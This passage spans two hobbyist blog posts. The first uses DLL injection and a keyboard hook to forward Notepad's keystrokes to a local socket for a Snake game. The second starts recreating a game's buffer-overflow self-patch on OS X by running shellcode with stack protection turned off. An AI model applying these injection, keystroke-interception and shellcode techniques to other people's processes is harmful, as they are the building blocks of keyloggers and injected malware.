<span class="c1">//TEXT macro "Identifies a string as Unicode when UNICODE is defined by a preprocessor directive during compilation. Otherwise, ANSI string"</span>
<span class="n">PTHREAD_START_ROUTINE</span> <span class="n">loadLibraryFunc</span> <span class="o">=</span> <span class="p">(</span><span class="n">PTHREAD_START_ROUTINE</span><span class="p">)</span><span class="n">GetProcAddress</span><span class="p">(</span><span class="n">GetModuleHandle</span><span class="p">(</span><span class="n">TEXT</span><span class="p">(</span><span class="s">"Kernel32.dll"</span><span class="p">)),</span> <span class="s">"LoadLibraryA"</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="n">loadLibraryFunc</span> <span class="o">==</span> <span class="nb">NULL</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"Could not find LoadLibraryA function inside kernel32.dll</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
<span class="k">return</span><span class="p">;</span>
<span class="p">}</span>
<span class="c1">//now create a thread in remote process that loads our target dll using LoadLibraryA</span>
<span class="n">HANDLE</span> <span class="n">remoteThread</span> <span class="o">=</span> <span class="n">CreateRemoteThread</span><span class="p">(</span>
<span class="n">handle</span><span class="p">,</span>
<span class="nb">NULL</span><span class="p">,</span> <span class="c1">//default thread security</span>
<span class="mi">0</span><span class="p">,</span> <span class="c1">//stack size for thread</span>
<span class="n">loadLibraryFunc</span><span class="p">,</span> <span class="c1">//pointer to start of thread function (for us, LoadLibraryA)</span>
<span class="n">dllPathRemote</span><span class="p">,</span> <span class="c1">//pointer to variable being passed to thread function</span>
<span class="mi">0</span><span class="p">,</span> <span class="c1">//0 means the thread runs immediately after creation</span>
<span class="nb">NULL</span><span class="p">);</span> <span class="c1">//we don't care about getting back the thread identifier</span>
<span class="k">if</span> <span class="p">(</span><span class="n">remoteThread</span> <span class="o">==</span> <span class="nb">NULL</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"Could not create remote thread.</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
<span class="k">return</span><span class="p">;</span>
<span class="p">}</span>
<span class="k">else</span>
<span class="p">{</span>
<span class="n">fprintf</span><span class="p">(</span><span class="n">stdout</span><span class="p">,</span> <span class="s">"Success! remote thread started in process %lu</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">processID</span><span class="p">);</span>
<span class="p">}</span>
<span class="c1">// Wait for the remote thread to terminate</span>
<span class="n">WaitForSingleObject</span><span class="p">(</span><span class="n">remoteThread</span><span class="p">,</span> <span class="n">INFINITE</span><span class="p">);</span>
<span class="c1">//once we're done, free the memory we allocated in the remote process for the dllPathname, and shut down</span>
<span class="n">VirtualFreeEx</span><span class="p">(</span><span class="n">handle</span><span class="p">,</span> <span class="n">dllPathRemote</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="n">MEM_RELEASE</span><span class="p">);</span>
<span class="n">CloseHandle</span><span class="p">(</span><span class="n">remoteThread</span><span class="p">);</span>
<span class="n">CloseHandle</span><span class="p">(</span><span class="n">handle</span><span class="p">);</span>
<span class="p">}</span>
<span class="n">DWORD</span> <span class="nf">findPidByName</span><span class="p">(</span><span class="k">const</span> <span class="kt">char</span><span class="o">*</span> <span class="n">name</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">HANDLE</span> <span class="n">h</span><span class="p">;</span>
<span class="n">PROCESSENTRY32</span> <span class="n">singleProcess</span><span class="p">;</span>
<span class="n">h</span> <span class="o">=</span> <span class="n">CreateToolhelp32Snapshot</span><span class="p">(</span> <span class="c1">//takes a snapshot of specified processes</span>
<span class="n">TH32CS_SNAPPROCESS</span><span class="p">,</span> <span class="c1">//get all processes</span>
<span class="mi">0</span><span class="p">);</span> <span class="c1">//ignored for SNAPPROCESS</span>
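<span class="n">singleProcess</span><span class="p">.</span><span class="n">dwSize</span> <span class="o">=</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">PROCESSENTRY32</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">Process32First</span><span class="p">(</span><span class="n">h</span><span class="p">,</span> <span class="o">&</span><span class="n">singleProcess</span><span class="p">))</span> <span class="c1">//fill in the first entry before the loop reads it</span>
<span class="p">{</span>
<span class="n">CloseHandle</span><span class="p">(</span><span class="n">h</span><span class="p">);</span>
<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>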
<span class="k">do</span> <span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="n">strcmp</span><span class="p">(</span><span class="n">singleProcess</span><span class="p">.</span><span class="n">szExeFile</span><span class="p">,</span> <span class="n">name</span><span class="p">)</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">DWORD</span> <span class="n">pid</span> <span class="o">=</span> <span class="n">singleProcess</span><span class="p">.</span><span class="n">th32ProcessID</span><span class="p">;</span>
<span class="n">printf</span><span class="p">(</span><span class="s">"PID Found: %lu</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">pid</span><span class="p">);</span>
<span class="n">CloseHandle</span><span class="p">(</span><span class="n">h</span><span class="p">);</span>
<span class="k">return</span> <span class="n">pid</span><span class="p">;</span>
<span class="p">}</span>
<span class="p">}</span> <span class="k">while</span> <span class="p">(</span><span class="n">Process32Next</span><span class="p">(</span><span class="n">h</span><span class="p">,</span> <span class="o">&</span><span class="n">singleProcess</span><span class="p">));</span>
<span class="n">CloseHandle</span><span class="p">(</span><span class="n">h</span><span class="p">);</span>
<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
<span class="kt">int</span> <span class="nf">main</span><span class="p">(</span><span class="kt">int</span> <span class="n">argc</span><span class="p">,</span> <span class="k">const</span> <span class="kt">char</span><span class="o">**</span> <span class="n">argv</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="n">argc</span> <span class="o">!=</span> <span class="mi">3</span><span class="p">)</span>
<span class="p">{</span>
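<span class="n">printHelp</span><span class="p">();</span>
<span class="k">return</span> <span class="mi">1</span><span class="p">;</span> <span class="c1">//bail out rather than reading arguments that aren't there</span>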
<span class="p">}</span>
<span class="n">createRemoteThread</span><span class="p">(</span><span class="n">findPidByName</span><span class="p">(</span><span class="n">argv</span><span class="p">[</span><span class="mi">1</span><span class="p">]),</span> <span class="n">argv</span><span class="p">[</span><span class="mi">2</span><span class="p">]);</span>
<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
</details></div>
<p>This was enough to get a message box popping up in a running instance of Notepad, which was super cool. Unfortunately I realized pretty much immediately after I got this working that I had no idea how to go from popping a message box to using this to actually change Notepad’s behaviour.</p>
<div align="center">
<img src="/images/post_images/2020-05-20/message_popup.PNG" />
<font size="2">Celebrate the little things</font>
<br /><br />
</div>
<h2 id="lets-try-hooking">Let’s Try Hooking!</h2>
<p>My message box app could make something new happen in another process, but I actually needed to be able to <em>change</em> the behaviour of the target process. I had heard vaguely about api hooking before, and my limited understanding of it was that it allowed you to either replace existing code paths, or add additional functionality to them. This seemed roughly in line with what I wanted, so I dove down this rabbit hole next.</p>
<p>Googling for how hooking works was less straightforward than dll injection, mostly because hooking is much more complicated. I eventually realized that as long as I wanted to change a program’s response to a Windows system message, I could bypass a lot of this complexity and use a Win32 hook. Given that keyboard input reaches Windows processes as system messages, and that a WH_KEYBOARD hook exists to intercept exactly those, I was in luck.</p>
<p>The <a href="https://docs.microsoft.com/en-us/windows/win32/winmsg/hooks">MSDN page for hooks</a> provides some basic information about how these types of hooks work, but the general idea is like this (note: I’m a super beginner at all of this so take everything I say with a grain of salt):</p>
<ul>
<li>Windows apps (and individual Win32 controls) receive events from the OS via system messages.</li>
<li>Before one of these messages is passed to the message handling function for a given Win32 window, it first gets passed to that message type’s “hook chain,” which is a list of functions that perform some action in response to that event type before the window has a chance to respond.</li>
<li>Each hook function is responsible for passing the system message information to the next item in the hook chain</li>
<li>If a hook function <em>doesn’t</em> call the next function in the hook chain, the message can be lost before the window ever gets a chance to respond to it.</li>
</ul>
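<p>The list above can be modelled in a few lines of plain C. To be clear, this is a toy model of the idea and not how Windows implements it: HookChain, callNext, dispatchKey and the two example hooks are all made-up names, with callNext standing in for the role that CallNextHookEx() plays in a real hook.</p>

```c
#include <stddef.h>

/* Toy model only: none of these names are Win32 APIs. */
typedef struct HookChain HookChain;
typedef int (*HookFn)(HookChain* chain, size_t index, int keyCode);

struct HookChain {
    HookFn hooks[4];     /* the hook functions, in the order they run */
    size_t count;        /* how many entries of hooks[] are in use */
    int    deliveredKey; /* last key the "window" received, or -1 */
};

/* Stand-in for CallNextHookEx: run the next hook, or hand the key to the window. */
int callNext(HookChain* chain, size_t index, int keyCode)
{
    size_t next = index + 1;
    if (next < chain->count) return chain->hooks[next](chain, next, keyCode);
    chain->deliveredKey = keyCode; /* end of the chain: the window sees the key */
    return 0;
}

/* A well-behaved hook: does its work (nothing here) and passes the key along. */
int passThroughHook(HookChain* chain, size_t index, int keyCode)
{
    return callNext(chain, index, keyCode);
}

/* A hook that never calls callNext, so the key is lost before the window sees it. */
int swallowHook(HookChain* chain, size_t index, int keyCode)
{
    (void)chain; (void)index; (void)keyCode;
    return 1;
}

/* Send one key through the chain from the start. */
int dispatchKey(HookChain* chain, int keyCode)
{
    chain->deliveredKey = -1;
    if (chain->count == 0) { chain->deliveredKey = keyCode; return 0; }
    return chain->hooks[0](chain, 0, keyCode);
}
```

<p>A chain made only of passThroughHook entries leaves deliveredKey set to the key that was sent. Put a swallowHook anywhere in the chain and deliveredKey stays at -1, which is exactly the behaviour I was hoping to get out of Notepad.</p>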
<p>Given this information, it seemed reasonable to try to intercept the keyboard events sent to Notepad by creating a hook function which intentionally didn’t call the next function in the hook chain. After perusing the MSDN docs page about <a href="https://docs.microsoft.com/en-us/windows/win32/winmsg/using-hooks">using hooks</a>, I figured out that I was going to need to install a WH_KEYBOARD hook into Notepad’s Edit control.</p>
<p>The docs also point out that if you want to install a hook in a process other than your own, what you’re really doing is a form of dll injection. You need to place the hook function in a dll, and use SetWindowsHookEx() to load that dll’s code into the target application.</p>
<p>So with all that in mind, I put on my robe and wizard hat and got to work.</p>
<h2 id="writing-a-simple-hook-payload">Writing a Simple Hook Payload</h2>
<p>I started off by just trying to prevent Notepad from receiving keyboard input at all. All I needed to do for this was to hook WH_KEYBOARD and then <em>not</em> call the next hook in the hook chain, which seemed like an easy place to start. To write a hook function for WH_KEYBOARD, all you need to do is make sure to match the function signature of <a href="https://docs.microsoft.com/en-us/previous-versions/windows/desktop/legacy/ms644984(v=vs.85)">KeyboardProc()</a>. Given that I needed this function to do basically nothing, this was pretty easy:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="cp">#define WIN32_LEAN_AND_MEAN
#include <windows.h>
#include "inject_payload_disablekeyinput.h"
</span>
<span class="n">LRESULT</span> <span class="n">CALLBACK</span> <span class="nf">KeyboardProc</span><span class="p">(</span><span class="kt">int</span> <span class="n">code</span><span class="p">,</span> <span class="n">WPARAM</span> <span class="n">wParam</span><span class="p">,</span> <span class="n">LPARAM</span> <span class="n">lParam</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">return</span> <span class="mi">1</span><span class="p">;</span> <span class="c1">//nonzero, and no CallNextHookEx() call, so the keystroke stops here</span>
<span class="p">}</span>
<span class="n">BOOL</span> <span class="n">WINAPI</span> <span class="nf">DllMain</span><span class="p">(</span><span class="n">HINSTANCE</span> <span class="n">hinstDLL</span><span class="p">,</span> <span class="n">DWORD</span> <span class="n">ul_reason_for_call</span><span class="p">,</span> <span class="n">LPVOID</span> <span class="n">lpvReserved</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">return</span> <span class="nb">true</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
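<p>The payload above ignores its arguments, but they matter once you want to do more than block input. For a WH_KEYBOARD hook, wParam holds the virtual-key code and lParam packs several flags into one value. Here is a small sketch of unpacking the fields I believe the KeyboardProc docs describe (repeat count in bits 0-15, scan code in bits 16-23, previous key state in bit 30, transition state in bit 31). The helper names are made up, and it takes a plain uint32_t rather than an LPARAM so it builds without windows.h.</p>

```c
#include <stdint.h>

/* Bits 0-15: how many times the keystroke repeated while the key was held. */
unsigned keyRepeatCount(uint32_t lParam)
{
    return lParam & 0xFFFFu;
}

/* Bits 16-23: the hardware scan code. */
unsigned keyScanCode(uint32_t lParam)
{
    return (lParam >> 16) & 0xFFu;
}

/* Bit 30: 1 if the key was already down before this message was sent. */
int keyWasDown(uint32_t lParam)
{
    return (int)((lParam >> 30) & 1u);
}

/* Bit 31: 0 if the key is being pressed, 1 if it is being released. */
int keyIsBeingReleased(uint32_t lParam)
{
    return (int)((lParam >> 31) & 1u);
}
```

<p>Inside a real hook you would call these as keyIsBeingReleased((uint32_t)lParam), for example to react only to the initial press of a key and ignore auto-repeat and key-up messages.</p>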
<h2 id="installing-a-hook-in-notepadexe">Installing A Hook In Notepad.exe</h2>
<p>The code for installing a windows hook is very straightforward (and shown below).</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="n">bool</span> <span class="nf">installRemoteHook</span><span class="p">(</span><span class="n">DWORD</span> <span class="n">threadId</span><span class="p">,</span> <span class="k">const</span> <span class="kt">char</span><span class="o">*</span> <span class="n">hookDLL</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">HMODULE</span> <span class="n">hookLib</span> <span class="o">=</span> <span class="n">LoadLibrary</span><span class="p">(</span><span class="n">hookDLL</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="n">hookLib</span> <span class="o">==</span> <span class="nb">NULL</span><span class="p">)</span> <span class="k">return</span> <span class="nb">false</span><span class="p">;</span>
<span class="n">HOOKPROC</span> <span class="n">hookFunc</span> <span class="o">=</span> <span class="p">(</span><span class="n">HOOKPROC</span><span class="p">)</span><span class="n">GetProcAddress</span><span class="p">(</span><span class="n">hookLib</span><span class="p">,</span> <span class="s">"KeyboardProc"</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="n">hookFunc</span> <span class="o">==</span> <span class="nb">NULL</span><span class="p">)</span> <span class="k">return</span> <span class="nb">false</span><span class="p">;</span>
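<span class="n">HHOOK</span> <span class="n">hook</span> <span class="o">=</span> <span class="n">SetWindowsHookEx</span><span class="p">(</span><span class="n">WH_KEYBOARD</span><span class="p">,</span> <span class="n">hookFunc</span><span class="p">,</span> <span class="n">hookLib</span><span class="p">,</span> <span class="n">threadId</span><span class="p">);</span>
<span class="k">return</span> <span class="n">hook</span> <span class="o">!=</span> <span class="nb">NULL</span><span class="p">;</span> <span class="c1">//SetWindowsHookEx returns NULL if the hook couldn't be installed</span>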
<span class="p">}</span></code></pre></figure>
<p>The threadId function argument restricts the hook to the thread that owns Notepad’s Edit control (passing 0 instead would make it a global hook). Getting the thread id is just a matter of calling <a href="https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-getwindowthreadprocessid">GetWindowThreadProcessId()</a> on the HWND for the Edit control. You can get the HWND with the GetWindowForProcessAndClassName() function from <a href="/blog/2020/05/20/Rendering-With-Notepad.html">my last post</a>. Here’s that function again:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="n">HWND</span> <span class="nf">GetWindowForProcessAndClassName</span><span class="p">(</span><span class="n">DWORD</span> <span class="n">pid</span><span class="p">,</span> <span class="k">const</span> <span class="kt">char</span><span class="o">*</span> <span class="n">className</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">HWND</span> <span class="n">curWnd</span> <span class="o">=</span> <span class="n">GetTopWindow</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span> <span class="c1">//0 arg means to get the window at the top of the Z order</span>
<span class="kt">char</span> <span class="n">classNameBuf</span><span class="p">[</span><span class="mi">256</span><span class="p">];</span>
<span class="k">while</span> <span class="p">(</span><span class="n">curWnd</span> <span class="o">!=</span> <span class="nb">NULL</span><span class="p">){</span>
<span class="n">DWORD</span> <span class="n">curPid</span><span class="p">;</span>
<span class="n">DWORD</span> <span class="n">dwThreadId</span> <span class="o">=</span> <span class="n">GetWindowThreadProcessId</span><span class="p">(</span><span class="n">curWnd</span><span class="p">,</span> <span class="o">&</span><span class="n">curPid</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="n">curPid</span> <span class="o">==</span> <span class="n">pid</span><span class="p">){</span>
<span class="n">GetClassName</span><span class="p">(</span><span class="n">curWnd</span><span class="p">,</span> <span class="n">classNameBuf</span><span class="p">,</span> <span class="mi">256</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="n">strcmp</span><span class="p">(</span><span class="n">className</span><span class="p">,</span> <span class="n">classNameBuf</span><span class="p">)</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span> <span class="k">return</span> <span class="n">curWnd</span><span class="p">;</span>
<span class="n">HWND</span> <span class="n">childWindow</span> <span class="o">=</span> <span class="n">FindWindowEx</span><span class="p">(</span><span class="n">curWnd</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">,</span> <span class="n">className</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="n">childWindow</span> <span class="o">!=</span> <span class="nb">NULL</span><span class="p">)</span> <span class="k">return</span> <span class="n">childWindow</span><span class="p">;</span>
<span class="p">}</span>
<span class="n">curWnd</span> <span class="o">=</span> <span class="n">GetNextWindow</span><span class="p">(</span><span class="n">curWnd</span><span class="p">,</span> <span class="n">GW_HWNDNEXT</span><span class="p">);</span>
<span class="p">}</span>
<span class="k">return</span> <span class="nb">NULL</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
<p>One thing to note about the installRemoteHook() function is that because it gets the function pointer for the callback with GetProcAddress(), the compiled name of the hook callback is important. This meant that I needed to export that function inside an extern “C” block to prevent the compiler from mangling the function name.</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="cp">#pragma once
</span><span class="k">extern</span> <span class="s">"C"</span>
<span class="p">{</span>
<span class="kr">__declspec</span><span class="p">(</span><span class="n">dllexport</span><span class="p">)</span> <span class="n">LRESULT</span> <span class="n">CALLBACK</span> <span class="n">KeyboardProc</span><span class="p">(</span><span class="kt">int</span> <span class="n">code</span><span class="p">,</span> <span class="n">WPARAM</span> <span class="n">wParam</span><span class="p">,</span> <span class="n">LPARAM</span> <span class="n">lParam</span><span class="p">);</span>
<span class="p">}</span></code></pre></figure>
<p>If you want to see what all of this looks like in practice, the <a href="https://github.com/khalladay/render-with-notepad">github repo</a> for this blog post has a proof of concept hooking app that uses the hook payload described above to disable key input to an instance of Notepad.</p>
<h2 id="redirecting-keyboard-input-to-a-different-process">Redirecting Keyboard Input to a Different Process</h2>
<p>Simply preventing Notepad from getting keyboard input was cool and all, but it was a far cry from being able to redirect that input to a game. What I wanted to be able to do was both prevent Notepad from getting keyboard input (so that the user couldn’t type characters and mess up what I was rendering), <em>and</em> redirect that key input to the process I was using to control my game logic.</p>
<p>Redirecting the key input to a different process wasn’t much more difficult than preventing key input. I just copy/pasted the code for disabling key input and made the following changes:</p>
<ul>
<li>The Hooking app opens up a socket, and starts listening for messages before installing the hook</li>
<li>In the payload, when the first keyboard message is intercepted, the payload creates a client socket and connects to the Injector app</li>
<li>Then, whenever a keyboard message is seen by the hook callback, it sends that char code to the Injector app via this client socket</li>
</ul>
<p>I’m not going to walk through how to set up windows sockets (but all the code for doing so is on the <a href="https://github.com/khalladay/render-with-notepad">github page</a> for this project). Instead, I just want to share the hook payload that I used to make this all happen.</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="n">SOCKET</span> <span class="n">sock</span> <span class="o">=</span> <span class="n">INVALID_SOCKET</span><span class="p">;</span>
<span class="n">LRESULT</span> <span class="n">CALLBACK</span> <span class="nf">KeyboardProc</span><span class="p">(</span><span class="kt">int</span> <span class="n">code</span><span class="p">,</span> <span class="n">WPARAM</span> <span class="n">wParam</span><span class="p">,</span> <span class="n">LPARAM</span> <span class="n">lParam</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">const</span> <span class="kt">int</span> <span class="n">BUFLEN</span> <span class="o">=</span> <span class="mi">512</span><span class="p">;</span>
<span class="kt">char</span> <span class="n">sendBuf</span><span class="p">[</span><span class="n">BUFLEN</span><span class="p">];</span>
<span class="n">memset</span><span class="p">(</span><span class="n">sendBuf</span><span class="p">,</span> <span class="sc">'\0'</span><span class="p">,</span> <span class="n">BUFLEN</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="n">sock</span> <span class="o">==</span> <span class="n">INVALID_SOCKET</span><span class="p">){</span>
<span class="n">sock</span> <span class="o">=</span> <span class="n">CreateClientSocket</span><span class="p">(</span><span class="s">"localhost"</span><span class="p">,</span> <span class="s">"1337"</span><span class="p">);</span>
<span class="p">}</span>
<span class="kt">int</span> <span class="n">isKeyDown</span> <span class="o">=</span> <span class="p">(</span><span class="kt">int</span><span class="p">)</span><span class="n">lParam</span> <span class="o">>></span> <span class="mi">30</span><span class="p">;</span>
<span class="k">if</span> <span class="p">(</span><span class="n">isKeyDown</span><span class="p">){</span>
<span class="n">_itoa_s</span><span class="o"><</span><span class="mi">512</span><span class="o">></span><span class="p">((</span><span class="kt">int</span><span class="p">)</span><span class="n">wParam</span><span class="p">,</span> <span class="n">sendBuf</span><span class="p">,</span> <span class="mi">10</span><span class="p">);</span>
<span class="n">send</span><span class="p">(</span><span class="n">sock</span><span class="p">,</span> <span class="n">sendBuf</span><span class="p">,</span> <span class="p">(</span><span class="kt">int</span><span class="p">)</span><span class="n">strlen</span><span class="p">(</span><span class="n">sendBuf</span><span class="p">),</span> <span class="mi">0</span><span class="p">);</span>
<span class="p">}</span>
<span class="k">return</span> <span class="mi">1</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
<p>Extracting the key state from the lParam was a little weird, since the state flags are packed into the upper bits of that value, but it seemed like the best way to get at that information. If you wanted to write a more robust input handling hook, you’d probably care about more of the data in that parameter than I did, but this was enough for getting WASD.</p>
<p>Once this was working, it was a very small jump from there to a working real time game.</p>
<h2 id="snake-finally">Snake, Finally!</h2>
<p>So yeah, the fruit of all this labor isn’t super exciting. I made Snake. It lends itself super well to ascii graphics (even if the fact that characters are taller than they are wide is a bit annoying), and I already had the gameplay logic written from a <a href="/blog/2019/12/04/Recreating-A-Dirty-Gamedev-Hack.html">couple posts ago</a>.</p>
<p>There’s not really much interesting to say about implementing Snake, and I’ve already talked through everything else, so I’m going to end things off with another gif of me playing snake in a hijacked Notepad.exe window. I hope you enjoyed the process of getting here as much as I did, because the end product is (as promised) super dumb.</p>
<div align="center">
<img src="/images/post_images/2020-05-20/snake.gif" />
<font size="2">It's a terrible quality gif... but you get the idea</font>
<br /><br />
</div>
<h1>Recreating An Old "Dirty Gamedev Trick"</h1>
<p>2019-12-04, <a href="http://kylehalladay.com/blog/2019/12/04/Recreating-A-Dirty-Gamedev-Hack">http://kylehalladay.com/blog/2019/12/04/Recreating-A-Dirty-Gamedev-Hack</a></p>
<p>There’s a story that pops up in my twitter feed every 6 months or so. The original version of it is from a Gamasutra article published in 2013 which contained a collection of stories of various “dirty” tricks used in previous games (<a href="https://www.gamasutra.com/view/feature/194772/dirty_game_development_tricks.php">link</a>). There are a lot of fun stories in the article, but one stands head and shoulders above the rest in terms of awesomeness. I’ve copied the specific story below so that this post makes sense even in the unlikely event of the original link going dead.</p>
<div style="padding-left: 20px; padding-right: 20px; line-height: 11pt; font-size:10pt; border:dashed; background-color:#FFEEDD">
<strong><font size="+1"><br />
(s)elf-exploitation</font></strong><br />
<font size="-1">Jonathan Garrett, Insomniac Games</font><br />
<br />
<em>Ratchet and Clank: Up Your Arsenal</em> was an online title that shipped without the ability to patch either code or data. Which was unfortunate.<br />
<br />
The game downloads and displays an End User License Agreement each time it's launched. This is an ascii string stored in a static buffer. This buffer is filled from the server without checking that the size is within the buffer's capacity.<br />
<br />
We exploited this fact to cause the EULA download to overflow the static buffer far enough to also overwrite a known global variable. This variable happened to be the function callback handler for a specific network packet. Once this handler was installed, we could send the network packet to cause a jump to the address in the overwritten global. The address was a pointer to some payload code that was stored earlier in the EULA data.<br />
<br />
Valuable data existed between the real end of the EULA buffer and the overwritten global, so the first job of the payload code was to restore this trashed data. Once that was done things were back to normal and the actual patching work could be done.<br />
<br />
One complication is that the EULA text is copied with strcpy. And strcpy ends when it finds a 0 byte (which is usually the end of the string). Our string contained code which often contains 0 bytes. So we mutated the compiled code such that it contained no zero bytes and had a carefully crafted piece of bootstrap asm to un-mutate it.<br />
<br />
By the end, the hack looked like this:<br />
<br />
1. Send oversized EULA<br />
2. Overflow EULA buffer, miscellaneous data, callback handler pointer<br />
3. Send packet to trigger handler<br />
4. Game jumps to bootstrap code pointed to by handler<br />
5. Bootstrap decodes payload data<br />
6. Payload downloads and restores stomped miscellaneous data<br />
7. Patch executes<br />
<br />
Takeaways: Include patching code in your shipped game, and don't use unbounded strcpy. <br />
<br />
</div>
<p><br /></p>
<p>Suffice to say that this story is not an example of what modern day game development is like, but I think that’s what makes it so appealing. Most of my day at work is spent sorting out problems in huge codebases made up of abstractions layered over other abstractions layered over third party libraries and legacy code. This is the polar opposite of that, and I want to get me some of it. So this is the story of how I recreated this on OS X.</p>
<p>I want to caveat the entire article by saying that this post is going to contain a lot of terrible assembly. I hadn’t written much assembly before I started this project and I’m sure it shows. That being said, let’s get started!</p>
<h2 id="first-you-can-run-arbitrary-machine-code-at-runtime">First: You Can Run Arbitrary Machine Code at Runtime?</h2>
<p>The first thing that jumped out at me in this story was the part about sending machine code over the network to be executed by the game. It had never occurred to me that this was possible, despite it being obvious in hindsight. With some help from <a href="http://www.vividmachines.com/shellcode/shellcode.html#linex1">this article</a>, I was able to prove that this was going to work on OS X too. First I wrote a quick bit of assembly (in this case, just enough to call exit(42)):</p>
<figure class="highlight"><pre><code class="language-as" data-lang="as"><span class="p">.</span><span class="nx">text</span>
<span class="p">.</span><span class="nx">globl</span> <span class="nx">_main</span>
<span class="nl">_main</span><span class="p">:</span>
<span class="nx">mov</span> <span class="nx">$42</span><span class="p">,</span> <span class="o">%</span><span class="nx">di</span>
<span class="nx">movl</span> <span class="nx">$0x2000001</span><span class="p">,</span> <span class="o">%</span><span class="nx">eax</span>
<span class="nx">syscall</span></code></pre></figure>
<p>Assembled it with OS X’s built in “as” tool, and disassembled it with objdump to get the hex machine code bytes:</p>
<figure class="highlight"><pre><code class="language-text" data-lang="text">1ff5: 66 bf 2a 00 movw $42, %di
1ff9: b8 01 00 00 02 movl $33554433, %eax
1ffe: 0f 05 syscall</code></pre></figure>
<p>Then I copied those bytes to a string and tried to run it:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="kt">int</span> <span class="nf">main</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">char</span><span class="o">*</span> <span class="n">code</span> <span class="o">=</span> <span class="s">"</span><span class="se">\x66\xbf\x2a\x00\xb8\x01\x00\x00\x02\x0f\x05</span><span class="s">"</span><span class="p">;</span>
<span class="p">((</span><span class="kt">void</span><span class="p">(</span><span class="o">*</span><span class="p">)())</span><span class="n">code</span><span class="p">)();</span>
<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
<p>The above returns the value 42 and the “return 0” statement never gets executed, which is cool. However, this wasn’t enough to prove anything because it only worked when the code string was a constant. Trying to copy that string to a different (non-constant) buffer and then execute the instructions there failed immediately:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="kt">int</span> <span class="nf">main</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">char</span><span class="o">*</span> <span class="n">code</span> <span class="o">=</span> <span class="s">"</span><span class="se">\x66\xbf\x2a\x00\xb8\x01\x00\x00\x02\x0f\x05</span><span class="s">"</span><span class="p">;</span>
<span class="kt">char</span> <span class="n">buff</span><span class="p">[</span><span class="mi">256</span><span class="p">];</span>
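<span class="n">memcpy</span><span class="p">(</span><span class="n">buff</span><span class="p">,</span> <span class="n">code</span><span class="p">,</span> <span class="mi">11</span><span class="p">);</span> <span class="c1">// copy only the 11 payload bytes; copying 256 would read past the end of the literal</span>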
<span class="p">((</span><span class="kt">void</span><span class="p">(</span><span class="o">*</span><span class="p">)())</span><span class="n">buff</span><span class="p">)();</span> <span class="c1">// will fail with EXC_BAD_ACCESS </span>
<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
<p>As it turns out, OS X has memory protections to help prevent folks from doing these sorts of shenanigans. If you compile on the command line with the arguments “-Wl,-allow_stack_execute”, clang will happily let this code run just fine. In fact, that argument will allow the above code to work regardless of whether buff is on the stack, in the bss section, or in the data section.</p>
<p>Note that no matter what I did, I couldn’t get Xcode 10 to recognize that flag; it only worked from the command line. It’s also important to note that the flag has no effect if you compile objective-c (or objective-c++) code with it. I could be missing something, but I got bored and just fell back to the command line / plain C++ instead of continuing to fight with it.</p>
<p>The PlayStation 2 was gone well before I entered the industry, but based on googling and asking a few coworkers who had some experience on it, it seems unlikely that the PS2 had the same kind of memory security, so I don’t feel too bad about disabling OS X’s to get this project done.</p>
<h2 id="step-two-useful-buffer-overflows">Step Two: Useful Buffer Overflows</h2>
<p>My next goal was to use a buffer overflow to redirect a function pointer to a buffer that I controlled. I’d never intentionally overflowed a buffer before, but boy do I have experience tracking and fixing memory stomps, so this felt pretty natural (in theory). In practice it was a bit messier. Consider the following code:</p>
